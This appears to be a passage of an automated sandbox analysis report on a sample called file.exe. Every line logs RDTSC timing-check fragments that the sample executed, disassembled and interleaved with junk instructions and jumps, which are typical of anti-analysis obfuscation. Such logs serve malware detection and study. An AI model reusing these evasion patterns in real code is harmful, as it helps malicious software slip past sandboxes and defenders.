Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B68D second address: 61B694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B694 second address: 61B6AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F075CBABECFh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B6AA second address: 61B6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F075D128F14h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B6BB second address: 61B6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F075CBABED8h 0x00000009 jmp 00007F075CBABED4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B817 second address: 61B839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F075D128F02h 0x0000000c jnc 00007F075D128EF6h 0x00000012 jc 00007F075D128EF6h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B839 second address: 61B83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61BB1E second address: 61BB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61BB22 second address: 61BB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620004 second address: 620020 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075D128F02h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620020 second address: 620025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620025 second address: 62002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62002B second address: 620063 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F075CBABED7h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 jmp 00007F075CBABECFh 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620063 second address: 620092 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F075D128EFCh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F075D128F02h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62032D second address: 620340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620340 second address: 620371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jbe 00007F075D128F0Dh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620371 second address: 62038A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F075CBABEC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F075CBABEC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62038A second address: 620399 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F075D128EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623698 second address: 6236AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F075CBABEC6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jl 00007F075CBABECEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE02B2 second address: 4CE02B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE02B6 second address: 4CE02BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE02BC second address: 4CE02D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov ecx, 4287383Dh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD007D second address: 4CD0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0095 second address: 4CD00AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00AD second address: 4CD00B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00B1 second address: 4CD00B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00B7 second address: 4CD00D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD00D4 second address: 4CD00D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00DDD second address: 4D00E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F075CBABED0h 0x00000010 push eax 0x00000011 jmp 00007F075CBABECBh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F075CBABED6h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F075CBABECDh 0x00000027 sbb si, 93C6h 0x0000002c jmp 00007F075CBABED1h 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00E5A second address: 4D00E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00E5F second address: 4D00E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00E65 second address: 4D00E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0157 second address: 4CA01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075CBABED7h 0x00000009 adc eax, 79C70F9Eh 0x0000000f jmp 00007F075CBABED9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F075CBABED0h 0x0000001b adc al, FFFFFF98h 0x0000001e jmp 00007F075CBABECBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov eax, 20DEE56Bh 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA01C0 second address: 4CA0210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push dword ptr [ebp+04h] 0x00000009 jmp 00007F075D128F08h 0x0000000e push dword ptr [ebp+0Ch] 0x00000011 jmp 00007F075D128F00h 0x00000016 push dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F075D128F07h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0210 second address: 4CA0228 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA023C second address: 4CA0240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0240 second address: 4CA0246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0246 second address: 4CA0271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 78C4h 0x00000007 pushfd 0x00000008 jmp 00007F075D128EFDh 0x0000000d jmp 00007F075D128EFBh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0271 second address: 4CA0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0275 second address: 4CA0279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0279 second address: 4CA027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C4F second address: 4CC0C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C55 second address: 4CC0C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABECDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C66 second address: 4CC0C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C6A second address: 4CC0C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0C78 second address: 4CC0CF4 instructions: 0x00000000 rdtsc 0x00000002 mov cl, 9Fh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F075D128F01h 0x0000000c and ax, 4726h 0x00000011 jmp 00007F075D128F01h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b pushad 0x0000001c mov al, EAh 0x0000001e call 00007F075D128F09h 0x00000023 pushfd 0x00000024 jmp 00007F075D128F00h 0x00000029 sub eax, 7A325B28h 0x0000002f jmp 00007F075D128EFBh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0CF4 second address: 4CC0CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0CFA second address: 4CC0D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075D128F09h 0x00000009 adc eax, 4705B9F6h 0x0000000f jmp 00007F075D128F01h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ax, bx 0x00000021 mov dh, 6Bh 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0D3E second address: 4CC0D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075CBABED8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC074E second address: 4CC0767 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0767 second address: 4CC076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC076B second address: 4CC0771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC040C second address: 4CC0445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F075CBABECBh 0x00000012 pop eax 0x00000013 jmp 00007F075CBABED9h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0445 second address: 4CC04BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F075D128F03h 0x0000000b or ah, 0000007Eh 0x0000000e jmp 00007F075D128F09h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F075D128F01h 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F075D128EFEh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F075D128F07h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0338 second address: 4CD033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD033D second address: 4CD0343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0343 second address: 4CD0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CD0347 second address: 4CD03D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, ebx 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F075D128F01h 0x00000017 sbb eax, 5B428786h 0x0000001d jmp 00007F075D128F01h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F075D128F00h 0x00000029 jmp 00007F075D128F05h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F075D128EFCh 0x00000039 and ecx, 06562C88h 0x0000003f jmp 00007F075D128EFBh 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 mov ecx, 0954B115h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00D49 second address: 4D00D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00D66 second address: 4D00D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D00D76 second address: 4D00D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0561 second address: 4CE0567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0567 second address: 4CE056B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE056B second address: 4CE057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE057A second address: 4CE05A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F075CBABED0h 0x00000008 pop ecx 0x00000009 jmp 00007F075CBABECBh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05A4 second address: 4CE05A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05A8 second address: 4CE05C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05C3 second address: 4CE066D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F075D128EFFh 0x00000008 pop esi 0x00000009 mov al, dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp+08h] 0x00000011 jmp 00007F075D128F00h 0x00000016 and dword ptr [eax], 00000000h 0x00000019 pushad 0x0000001a push eax 0x0000001b mov eax, ebx 0x0000001d pop ebx 0x0000001e pushfd 0x0000001f jmp 00007F075D128F06h 0x00000024 and eax, 18AB7FF8h 0x0000002a jmp 00007F075D128EFBh 0x0000002f popfd 0x00000030 popad 0x00000031 and dword ptr [eax+04h], 00000000h 0x00000035 pushad 0x00000036 mov dx, cx 0x00000039 push ecx 0x0000003a pushfd 0x0000003b jmp 00007F075D128F07h 0x00000040 and al, 0000006Eh 0x00000043 jmp 00007F075D128F09h 0x00000048 popfd 0x00000049 pop eax 0x0000004a popad 0x0000004b pop ebp 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F075D128EFAh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC05F1 second address: 4CC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F075CBABED1h 0x0000000a adc cx, DD76h 0x0000000f jmp 00007F075CBABED1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC061F second address: 4CC0645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F075D128EFDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0645 second address: 4CC06BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F075CBABED7h 0x00000009 sub cx, D00Eh 0x0000000e jmp 00007F075CBABED9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F075CBABED0h 0x0000001a sub ecx, 3FAAEE88h 0x00000020 jmp 00007F075CBABECBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F075CBABED0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06BA second address: 4CC06BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06BE second address: 4CC06C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06C4 second address: 4CC06D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F075D128EFDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC06D5 second address: 4CC06D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01A9 second address: 4CE01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01AD second address: 4CE01B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01B1 second address: 4CE01B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE01B7 second address: 4CE0204 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ch 0x0000000d push ebx 0x0000000e movzx esi, di 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F075CBABED1h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F075CBABECEh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0204 second address: 4CE0208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0208 second address: 4CE0225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075CBABED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0225 second address: 4CE0239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 9Ah 0x00000005 mov eax, 3AD4835Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0239 second address: 4CE023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE023D second address: 4CE0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0241 second address: 4CE0247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE03F2 second address: 4CE0423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F075D128EFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F075D128F09h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dh, 95h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0423 second address: 4CE0428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
